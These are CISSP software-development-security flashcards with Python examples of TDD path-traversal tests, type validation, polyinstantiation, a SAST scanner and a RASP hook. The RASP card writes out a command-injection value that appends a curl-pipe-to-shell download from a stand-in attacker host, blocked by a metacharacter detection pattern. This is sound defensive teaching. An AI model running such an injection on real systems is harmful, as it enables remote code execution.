Domain 8: Software Development Security Flashcards

1
Q

Extreme Programming (XP)

A

An agile methodology that uses integrated teams of developers, customers, and managers to drive the delivery of high-value software features in short iterations.
- Utilizes a practice known as pair programming: two developers share one workstation and take turns writing code and reviewing it, with the goal of higher quality code through continuous oversight and shared knowledge.

2
Q

Test-Driven Development (TDD)

A

First a test for the desired behaviour is written and run; it fails because the code does not exist yet. Then just enough code is written or refactored to make the test pass, and the cycle repeats. The ultimate goal is a state in which all tests pass, so the tests double as an executable specification and a regression suite.
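The red/green cycle described above, as an added example that is not part of the original flashcards: the tests are written first for a hypothetical `safe_join()` helper that must keep user-supplied filenames inside an upload directory, then the function is written to satisfy them. The `/srv/app/uploads` base directory and all the file names are constructed for the example.

```python
"""TDD walk-through: the test functions below were written before safe_join() existed."""
import os


# --- Step 1: write the tests first. Run now, they fail with NameError
# because safe_join is not defined yet: the "red" phase.

def test_plain_relative_path_is_allowed():
    assert safe_join("/srv/app/uploads", "reports/q1.pdf") == "/srv/app/uploads/reports/q1.pdf"


def test_dotdot_traversal_is_rejected():
    try:
        safe_join("/srv/app/uploads", "../../etc/passwd")
    except ValueError:
        return
    raise AssertionError("traversal was not rejected")


def test_absolute_path_is_rejected():
    # os.path.join("/srv/app/uploads", "/etc/passwd") discards the base entirely.
    try:
        safe_join("/srv/app/uploads", "/etc/passwd")
    except ValueError:
        return
    raise AssertionError("absolute path was not rejected")


def test_sibling_prefix_is_rejected():
    # "/srv/app/uploads2" starts with the string "/srv/app/uploads" but is not
    # inside it; a naive startswith() check would pass it, commonpath() does not.
    try:
        safe_join("/srv/app/uploads", "../uploads2/secret.txt")
    except ValueError:
        return
    raise AssertionError("sibling-prefix path was not rejected")


def test_internal_dotdot_that_stays_inside_is_allowed():
    assert safe_join("/srv/app/uploads", "reports/../q1.pdf") == "/srv/app/uploads/q1.pdf"


# --- Step 2: write just enough code to make every test pass: the "green" phase.

def safe_join(base_dir: str, user_path: str) -> str:
    """Return base_dir/user_path, or raise ValueError if the result escapes base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    # commonpath compares path components, not string prefixes.
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes {base!r}: {user_path!r}")
    return target


# --- Step 3: run everything; the goal state is all tests passing.

def run_tests() -> dict:
    results = {"passed": 0, "failed": 0}
    for name, fn in sorted(globals().items()):
        if name.startswith("test_") and callable(fn):
            try:
                fn()
                results["passed"] += 1
            except Exception as exc:  # AssertionError, or NameError in the red phase
                results["failed"] += 1
                print(f"FAIL {name}: {exc!r}")
    return results


if __name__ == "__main__":
    print(run_tests())
```

The sibling-prefix case is the one most often missed when the check is written before the test: it is exactly the kind of edge case TDD forces you to name up front.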

3
Q

DevOps Phases (8)

A
  • Plan
  • Code
  • Build
  • Test
  • Release
  • Deploy
  • Operate
  • Monitor
4
Q

DevSecOps Manifesto (9 canons)

A

• Leaning in - over Always Saying “No”
• Data & Security Science - over Fear, Uncertainty and Doubt
• Open Contribution & Collaboration - over Security-Only Requirements
• Consumable Security Services with APIs - over Mandated Security Controls & Paperwork
• Business Driven Security Scores - over Rubber Stamp Security
• Red & Blue Team Exploit Testing - over Relying on Scans & Theoretical Vulnerabilities
• 24x7 Proactive Security Monitoring - over Reacting after being Informed of an Incident
• Shared Threat Intelligence - over Keeping Info to Ourselves
• Compliance Operations - over Clipboards & Checklists

5
Q

Capability Maturity Model Integration (5 Maturity Levels)

A
  1. Initial - Processes are unpredictable, poorly controlled, and largely reactive.
  2. Managed - Processes are characterized or documented for individual projects and are often still reactive.
  3. Defined - Processes are characterized for the whole organization and are proactive.
  4. Quantitatively managed - Processes are measured and controlled using those measurements.
  5. Optimizing - The organization focuses on continuous process improvement.
  • Maintained by the CMMI Institute, which has been part of ISACA since 2016.
6
Q

The Software Assurance Maturity Model (SAMM) - 5 Phases

A

SAMM (now OWASP SAMM) is a prescriptive framework for implementing a software security program: it states which activities to perform and how to mature them, and focuses on integrating security activities into an existing SDLC. Its five business functions (each containing three security practices) are:
1. Governance
2. Design
3. Implementation
4. Verification
5. Operations

7
Q

Building Security-In Maturity Model (BSIMM) - 4 Domains

A

BSIMM is descriptive rather than prescriptive: it records what real organizations actually do, so a firm can determine the current state of its secure software creation capabilities, identify improvement opportunities, and prioritize efforts by comparison with peers. Its activities are grouped into four domains:
 Governance
 Intelligence
 SSDL Touchpoints (Software Security Development Lifecycle)
 Deployment

8
Q

Cybersecurity Maturity Model Certification (CMMC) - 5 Maturity Levels

A

CMMC is a US Department of Defense certification for contractors who handle federal contract information (FCI) and sensitive information known as controlled unclassified information (CUI) on behalf of government clients. The original CMMC 1.0 model defined five levels, each pairing a set of practices with a process-maturity expectation:
1. Basic Cyber Hygiene - practices are performed, ad hoc; protects FCI only.
2. Intermediate Cyber Hygiene - practices are documented; a transition step toward protecting CUI.
3. Good Cyber Hygiene - practices are managed; covers the NIST SP 800-171 requirements for protecting CUI.
4. Proactive - practices are reviewed and measured; adds protection against advanced persistent threats.
5. Advanced/Progressive - practices are optimized and standardized across the organization.
CMMC 2.0 (announced in November 2021) collapsed the model to three levels: Foundational, Advanced (aligned to NIST SP 800-171), and Expert (based on NIST SP 800-172).

9
Q

Compiled Programming Languages

A

Are translated into machine code before they are run, in a process known as compiling.
- Distributing only the binary does not expose the source code, though a binary can still be disassembled or decompiled; languages that compile to an intermediate bytecode (C# compiles to CIL, for example) decompile back to readable code quite easily, so this is obscurity, not protection.
- C# and Swift are examples of compiled languages.

10
Q

Interpreted Programming Languages

A

Are translated into machine-readable form as they are run, also known as on the fly. This makes interpreted code more portable across system types, since the same source runs wherever an interpreter exists.
- Exposes source code, and the interpreter itself must be installed, patched, and maintained on every target system, which adds operational overhead.
- JavaScript and Python are examples of interpreted languages.

11
Q

Static Type Checking

A

Performed at compile time, by the compiler or a separate static analyzer, before the program runs: every expression is checked against the declared types of its inputs, so a type mismatch becomes a build error rather than a runtime fault.

12
Q

Dynamic Type Checking

A

Checks the actual values stored in a program’s variables as it is running and raises an error when an operation is applied to data of the wrong type.
- Languages that enforce type rules (statically, dynamically, or both) and do not permit unchecked conversions are known as type-safe; type safety supports important security goals related to integrity of data, for example by preventing a string from being treated as an integer or a memory address.
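Dynamic checking in practice, as an added example that is not part of the original flashcards: Python is dynamically typed, so the interpreter catches some mismatches at run time (a string multiplied by a float) but accepts others that are legal Python yet wrong for the program (a string multiplied by an integer is string repetition). The order document, the `parse_quantity`/`parse_price` helpers, and the 1..10000 quantity range are all constructed for the example.

```python
import json
from typing import Any


def line_total_unchecked(quantity: Any, unit_price: Any) -> Any:
    """No checks at all: relies entirely on the interpreter's runtime type rules."""
    return quantity * unit_price


def demonstrate_dynamic_checks() -> dict:
    """Show which type confusions Python's dynamic checking catches, and which it does not."""
    outcomes = {}
    # str * float: the interpreter checks operand types at run time and refuses.
    try:
        line_total_unchecked("3", 2.50)
        outcomes["str_times_float"] = "accepted"
    except TypeError:
        outcomes["str_times_float"] = "TypeError"
    # str * int is legal Python (string repetition), so nothing is caught.
    outcomes["str_times_int"] = line_total_unchecked("3", 2)
    # bool is a subclass of int, so True * 2.50 quietly evaluates to 2.5.
    outcomes["bool_times_float"] = line_total_unchecked(True, 2.50)
    return outcomes


def parse_quantity(raw: Any) -> int:
    """Explicit check at the trust boundary; bool is rejected even though it is an int subclass."""
    if isinstance(raw, bool) or not isinstance(raw, int):
        raise TypeError(f"quantity must be an integer, got {type(raw).__name__}")
    if not 1 <= raw <= 10_000:
        raise ValueError(f"quantity out of range: {raw}")
    return raw


def parse_price(raw: Any) -> float:
    if isinstance(raw, bool) or not isinstance(raw, (int, float)):
        raise TypeError(f"unit_price must be a number, got {type(raw).__name__}")
    if raw < 0:
        raise ValueError(f"unit_price must not be negative: {raw}")
    return float(raw)


def line_total(order_json: str) -> float:
    """Parse an order document and compute the line total with validated types."""
    order = json.loads(order_json)
    # A static checker sees json.loads() as returning Any, so only the runtime
    # checks above stand between the untrusted document and the arithmetic.
    return parse_quantity(order["quantity"]) * parse_price(order["unit_price"])


def line_total_outcome(order_json: str) -> str:
    """Return a label instead of raising, so the cases can be compared side by side."""
    try:
        return f"{line_total(order_json):.2f}"
    except (TypeError, ValueError) as exc:
        return f"rejected: {type(exc).__name__}"


if __name__ == "__main__":
    print(demonstrate_dynamic_checks())
    for doc in ('{"quantity": 3, "unit_price": 2.5}',
                '{"quantity": "3", "unit_price": 2.5}',
                '{"quantity": true, "unit_price": 2.5}'):
        print(doc, "->", line_total_outcome(doc))
```

The point for integrity: the interpreter's own dynamic check is a safety net, not a validator. Data arriving from JSON, forms, or RPC is `Any` to a static checker and only loosely constrained at run time, so the explicit `isinstance` checks at the boundary are what actually enforce the type the rest of the program assumes.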

13
Q

Declarative Programming

A

Expresses the logic of a task without describing how it should be executed; in these languages, a system must interpret the logic and execute appropriate tasks.

14
Q

Imperative paradigm of programming

A

Uses statements or commands that change a program’s state, similar to issuing imperative commands in human languages like “stand up” or “study for the CISSP.”

15
Q

Procedural programming

A

Related to the imperative paradigm and is based on the concept of a program calling procedures, which are similar to routines or subroutines.

16
Q

Block structured programming

A

Languages utilize blocks as an organizational unit; the scope of program elements like variables and functions is restricted to the block in which they are declared, to prevent conflicts with elements of the same name elsewhere in the code.

17
Q

Object-oriented programming (OOP)

A

Instead of writing a sequence of commands that gather input data and run procedures on it, OOP bundles data (attributes) together with the functions that operate on that data (methods) into classes. Objects are instances of those classes, and they interact with one another only through defined interfaces.

18
Q

Encapsulation

A

This is also known as data hiding and is effectively a way of isolating an object’s internal data from being accidentally or deliberately mishandled. Direct access to an object’s data can be denied to external objects, so the data is reachable only through approved functions known as methods, which can enforce the object’s rules (for example, that a balance never goes negative).

19
Q

Inheritance

A

Classes of data objects can have subclasses that inherit some or all of the parent class’s characteristics, such as its attributes, methods, and access restrictions, and then extend or override them.

20
Q

Polymorphism in Programming

A

This term refers to the multiple (poly) forms (morphs) that a response to the same message can take: different objects can react to the same method call with different behaviour, typically because a subclass overrides a method inherited from its parent. Since the method that actually runs depends on the object’s runtime type, code written against the parent class may receive behaviour or data of a different type than it anticipated, which is the security concern: checks that hold for the base class may not hold for a subclass passed in its place.
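The three previous cards (encapsulation, inheritance, polymorphism) in one small Python program, as an added example that is not part of the original flashcards. The `Account` and `OverdraftAccount` classes and the `settle()` routine are constructed for the example; the negative balance that `settle()` produces is the polymorphism concern the card describes.

```python
class Account:
    """Encapsulation: _balance is only changed through withdraw(); readers get a property."""

    def __init__(self, owner: str, balance: int) -> None:
        self._owner = owner
        self._balance = balance

    @property
    def balance(self) -> int:
        return self._balance          # read-only: no setter is defined

    def _can_withdraw(self, amount: int) -> bool:
        return amount <= self._balance

    def withdraw(self, amount: int) -> int:
        """The only approved way to change the balance; enforces the class's rules."""
        if amount <= 0:
            raise ValueError("amount must be positive")
        if not self._can_withdraw(amount):
            raise ValueError(f"{self._owner}: insufficient funds")
        self._balance -= amount
        return self._balance


class OverdraftAccount(Account):
    """Inheritance: reuses Account's data handling, overrides only the withdrawal rule."""

    def __init__(self, owner: str, balance: int, overdraft_limit: int) -> None:
        super().__init__(owner, balance)
        self._overdraft_limit = overdraft_limit

    def _can_withdraw(self, amount: int) -> bool:
        return amount <= self._balance + self._overdraft_limit


def settle(accounts: list, amount: int) -> list:
    """Polymorphism: the same withdraw() call behaves differently per runtime class.

    Code written against Account might assume the balance never goes negative;
    an OverdraftAccount passed in its place silently breaks that assumption.
    """
    results = []
    for acct in accounts:
        try:
            results.append(acct.withdraw(amount))
        except ValueError as exc:
            results.append(str(exc))
    return results


def encapsulation_probe() -> dict:
    """Show what the property protects against, and what Python's convention does not."""
    acct = Account("alice", 100)
    try:
        acct.balance = 10_000          # blocked: the property has no setter
        property_write = "accepted"
    except AttributeError:
        property_write = "rejected"
    acct._balance = 10_000             # the single underscore is a convention, not a barrier
    return {"property_write": property_write, "bypassed_balance": acct.balance}


if __name__ == "__main__":
    print(settle([Account("alice", 100), OverdraftAccount("bob", 100, 50)], 120))
    print(encapsulation_probe())
```

Two practical caveats the probe shows: in Python, encapsulation is enforced by convention and by what the public interface offers, not by the runtime, so a hostile caller in the same process can still reach `_balance`; and any function that accepts an `Account` must be written for the weakest invariant of every subclass that can arrive, or must check the concrete type before relying on a rule.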

21
Q

Polyinstantiation

A

This term means making multiple (poly) copies (instances) of the same object, each at a different classification level, typically in a multilevel-secure database: two rows can share a primary key while holding different data under different sensitivity labels. A low-clearance user who inserts a row is not told that a higher-classified row with the same key already exists (refusing the insert would leak that fact through an inference channel), and the higher-classified row is not overwritten, so both confidentiality and integrity are preserved.
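The two-row situation described above, as an added example that is not part of the original flashcards: a tiny in-memory table keyed by (primary key, classification) rather than by primary key alone. The two classification levels, the flight record, and the `PolyinstantiatedTable` class are constructed for the example; a real multilevel database would enforce the same rule inside the engine.

```python
LEVELS = {"UNCLASSIFIED": 0, "SECRET": 1}


class PolyinstantiatedTable:
    """Rows are keyed by (primary_key, classification) instead of primary_key alone."""

    def __init__(self) -> None:
        self._rows: dict = {}          # (key, level) -> row data

    def insert(self, subject_level: str, key: str, **data) -> str:
        # Writes land at the subject's own level. A row at a higher level with
        # the same key is neither overwritten nor reported, so the low subject
        # learns nothing about its existence.
        self._rows[(key, subject_level)] = dict(data)
        return "inserted"

    def select(self, subject_level: str, key: str):
        # Return the most highly classified instance the subject is cleared to read.
        readable = [
            (LEVELS[level], level)
            for (k, level) in self._rows
            if k == key and LEVELS[level] <= LEVELS[subject_level]
        ]
        if not readable:
            return None
        _, level = max(readable)
        return {"classification": level, **self._rows[(key, level)]}

    def instances(self, key: str) -> int:
        return sum(1 for (k, _) in self._rows if k == key)


def scenario() -> dict:
    table = PolyinstantiatedTable()
    # A SECRET user records the real destination of flight 042.
    table.insert("SECRET", "FLIGHT-042", destination="Undisclosed site", cargo="Classified")
    # Later an UNCLASSIFIED user files a cover record with the same key.
    # Without polyinstantiation the database would have to either reject the
    # insert (revealing that a hidden row exists) or overwrite the SECRET row.
    table.insert("UNCLASSIFIED", "FLIGHT-042", destination="Denver", cargo="Mail")
    return {
        "instances": table.instances("FLIGHT-042"),
        "unclassified_view": table.select("UNCLASSIFIED", "FLIGHT-042"),
        "secret_view": table.select("SECRET", "FLIGHT-042"),
    }


if __name__ == "__main__":
    for name, value in scenario().items():
        print(f"{name}: {value}")
```

Both instances coexist: the unclassified query sees Denver and nothing else, the secret query sees the real row, and the secret row's integrity survived the lower-level insert.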

22
Q

Hypertext Markup Language (HTML)

A

Specifies the structure and content elements (headings, paragraphs, links, forms) of a document delivered to a web browser; the visual presentation of those elements is usually delegated to CSS.

23
Q

Cascading Style Sheets (CSS)

A

Allows definition for how a web document should be styled for display, including fonts, color, and layout/spacing of elements on the page.

24
Q

JavaScript

A

Provides interactive applications inside a web browser on a client system, often for displaying and manipulating data on the user’s screen.

25
Q

Python

A

A high-level interpreted language that can be used for a variety of uses ranging from small personal programs to large web applications.

26
Q

Static application security testing (SAST)

A

SAST evaluates source code and other nonrunning application elements such as bytecode or compiled binaries, without executing the application (white-box testing). Testing is performed in development or CI environments, so there is no impact on live production systems, and it can run early and often (in the IDE or on every commit); the trade-off is that it cannot see runtime configuration and tends to produce false positives that need triage.
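A minimal SAST rule, as an added example that is not part of the original flashcards: it parses a constructed Python source snippet with the standard-library `ast` module, never executes it, and flags calls to `eval`/`exec`/`os.system` and any `subprocess` call made with `shell=True`. The snippet, the rule set, and the `scan()` function are all constructed for the example; commercial tools do the same kind of walk with far larger rule sets and data-flow tracking.

```python
import ast

# Constructed sample under test; the scanner never runs it, it only parses it.
SAMPLE_SOURCE = '''
import subprocess, os
def run(cmd):
    return subprocess.run(cmd, shell=True)     # flagged: shell=True
def calc(expr):
    return eval(expr)                          # flagged: eval
def safe(path):
    return subprocess.run(["ls", "-l", path])  # not flagged: list form, no shell
os.system("ls")                                # flagged: os.system
'''

DANGEROUS_CALLS = {"eval", "exec", "os.system"}
SUBPROCESS_CALLS = {"subprocess.run", "subprocess.Popen", "subprocess.call",
                    "subprocess.check_output", "subprocess.check_call"}


def _qualified_name(func: ast.expr) -> str:
    """Turn the callee expression into a dotted name such as 'subprocess.run'."""
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute):
        base = _qualified_name(func.value)
        return f"{base}.{func.attr}" if base else func.attr
    return ""


class DangerousCallFinder(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings = []            # (line, callee, reason)

    def visit_Call(self, node: ast.Call) -> None:
        name = _qualified_name(node.func)
        if name in DANGEROUS_CALLS:
            self.findings.append((node.lineno, name, "dangerous call"))
        elif name in SUBPROCESS_CALLS:
            for kw in node.keywords:
                if kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True:
                    self.findings.append((node.lineno, name, "shell=True"))
        self.generic_visit(node)      # keep walking into nested calls/arguments


def scan(source: str) -> list:
    """Parse the source and return sorted (line, callee, reason) findings."""
    finder = DangerousCallFinder()
    finder.visit(ast.parse(source))
    return sorted(finder.findings)


if __name__ == "__main__":
    for line, callee, reason in scan(SAMPLE_SOURCE):
        print(f"line {line}: {callee} ({reason})")
```

The rule is purely syntactic: it will miss `shell=flag` where `flag` is a variable set to `True` elsewhere, and it will flag `eval` even where the argument is a hard-coded constant. Both illustrate why SAST results need triage and why data-flow analysis matters.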

27
Q

Dynamic application security testing (DAST)

A

DAST tests the application while it is running, from the outside, by sending requests to its interfaces and observing the responses (black-box testing). DAST tools can typically run against any application with a web interface or API regardless of the underlying language, and they are not tightly integrated with an IDE, which makes them easier for non-developers to use. Because they exercise live behaviour they find runtime and configuration issues that SAST cannot see, but they should be pointed at test environments rather than production.

28
Q

Interactive application security testing (IAST)

A
  • Combines elements of SAST and DAST: an agent instruments the running application and observes code paths, data flows, and sensitive sinks while functional or dynamic tests exercise it, so vulnerabilities discovered during dynamic testing can be correlated back to the responsible source code with fewer false positives than either technique alone.
29
Q

Runtime application self-protection (RASP)

A

Executes alongside the application as it runs. RASP is less a testing tool than a runtime control, and it is often incorporated into overall application security to complement SAST and DAST. A RASP agent integrates with the application (typically by hooking the runtime or framework), analyzes the program’s execution to spot unusual or unexpected behaviour such as a command or query built from untrusted input, and then takes corrective action: logging the event, blocking the call, or terminating the request.
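A stripped-down RASP hook, as an added example that is not part of the original flashcards: a wrapper that sits in front of a command-execution sink, inspects each call as the application makes it, and blocks the call when a string command with `shell=True` contains shell metacharacters. The `guard_shell` decorator, the `EVENTS` log, the blocklist of metacharacters, and the `_recording_sink` stand-in for `subprocess.run` are constructed for the example; `install()` shows how the same wrapper would be attached to the real sink.

```python
import re
import subprocess
from functools import wraps

# Shell metacharacters that turn one intended command into several.
SHELL_METACHARS = re.compile(r"[;&|`$<>\n]")
EVENTS: list = []                      # what a real RASP would ship to the SIEM


class RaspBlocked(RuntimeError):
    """Raised instead of executing a call the policy judged to be an injection."""


def guard_shell(sink):
    """Wrap a command-execution sink so each call is inspected before it runs."""
    @wraps(sink)
    def wrapper(args, *rest, **kwargs):
        if kwargs.get("shell") and isinstance(args, str) and SHELL_METACHARS.search(args):
            EVENTS.append({"action": "blocked", "sink": sink.__name__, "command": args})
            raise RaspBlocked(f"shell metacharacters in command: {args!r}")
        EVENTS.append({"action": "allowed", "sink": sink.__name__, "command": args})
        return sink(args, *rest, **kwargs)
    return wrapper


def install() -> None:
    """Hook the real sink in-process; afterwards every subprocess.run call is inspected.

    Call once at application start-up; calling it twice would wrap the wrapper.
    """
    subprocess.run = guard_shell(subprocess.run)


# Stand-in sink so the demonstration runs without spawning processes.
def _recording_sink(args, shell=False):
    return {"executed": args, "shell": shell}


protected_run = guard_shell(_recording_sink)


def demo() -> dict:
    results = {}
    results["list_form"] = protected_run(["ls", "-l", "/tmp"])["executed"]
    results["benign_shell"] = protected_run("ls -l /tmp", shell=True)["executed"]
    # Typical injection: the attacker-controlled part appends a second command.
    user_input = "/tmp; curl http://attacker.example/x | sh"
    try:
        protected_run("ls -l " + user_input, shell=True)
        results["injected"] = "executed"
    except RaspBlocked:
        results["injected"] = "blocked"
    return results


if __name__ == "__main__":
    print(demo())
    print(EVENTS[-1])
```

The metacharacter blocklist is a heuristic, which is the weak point of any RASP policy: it will block a legitimate pipeline written by the developer and it will miss injections that need no metacharacter (an extra argument such as `--output=/etc/cron.d/x`, for example). Production RASP products hook deeper, at the point where the runtime actually builds the process or query, so they can distinguish the developer's template from the tainted data.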